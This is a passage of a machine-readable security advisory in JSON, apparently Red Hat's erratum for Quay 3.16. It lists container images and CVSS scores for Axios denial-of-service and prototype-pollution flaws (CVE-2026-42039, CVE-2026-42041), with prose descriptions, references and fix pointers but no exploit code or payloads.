            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "axios: Axios: Arbitrary HTTP header injection via prototype pollution"
    },
    {
      "cve": "CVE-2026-42039",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-24T19:01:44.887156+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461630"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461630",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461630"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42039",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"
        }
      ],
      "release_date": "2026-04-24T18:01:30.775000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data"
    },
    {
      "cve": "CVE-2026-42041",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:41.034289+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461629"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461629",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461629"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42041",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"
        }
      ],
      "release_date": "2026-04-24T17:55:30.036000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
